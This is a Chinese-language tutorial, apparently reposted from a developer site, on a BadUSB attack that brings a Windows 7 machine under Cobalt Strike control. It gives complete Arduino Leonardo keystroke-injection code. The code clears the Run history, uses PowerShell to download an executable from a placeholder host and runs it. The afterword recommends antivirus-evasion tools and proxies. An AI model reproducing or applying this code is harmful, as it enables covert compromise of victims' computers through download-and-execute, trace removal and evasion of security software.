安全攻防之BadUsb攻击之CS上线

一、环境和准备

1.win7 X64系统

2.arduino Leonardo板子一块

3.cs4.4服务器（Linux已经启动CS并配置好监听器，本文不做讨论，感兴趣的自行百度）

win7安装好Leonardo板子驱动，后显示结果如下

Com3端口，烧录时候会用到；

HID编译工具，arduino-1.5.5-r2，

二、编译和上传代码到Leonardo板子

    将Leonardo板子插入电脑，安装完驱动后选择好对应的板子和对应的Com口，如下。

 将下面代码复制进去；

 void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f");
  delay(500); 
  Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://www.youwebXXX.com/test.exe';$file = ' C:\test.exe ';$clnt.DownloadFile($url,$file);"); 
  delay(3000);
  Keyboard.println("c:\test.exe&exit");
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

自行修改一下： $url= 'http://www.youwebXXX.com/test.exe'，直接点击上传。

 上传成功，Leonardo板子会自行弹出。

三、测试CS，打开客户端CS

插入后自动运行Powershell代码并成功上线CS。

 后记:exe文件或者ps最好做免杀

免杀推荐摧日cuiri和foureye，推荐挂代理

Cuiri免杀绕过：https://github.com/NyDubh3/CuiRi

https://github.com/lengjibo/FourEye 

最后

以上就是优秀啤酒为你收集整理的安全攻防之BadUsb攻击之CS上线的全部内容，希望文章能够帮你解决安全攻防之BadUsb攻击之CS上线所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。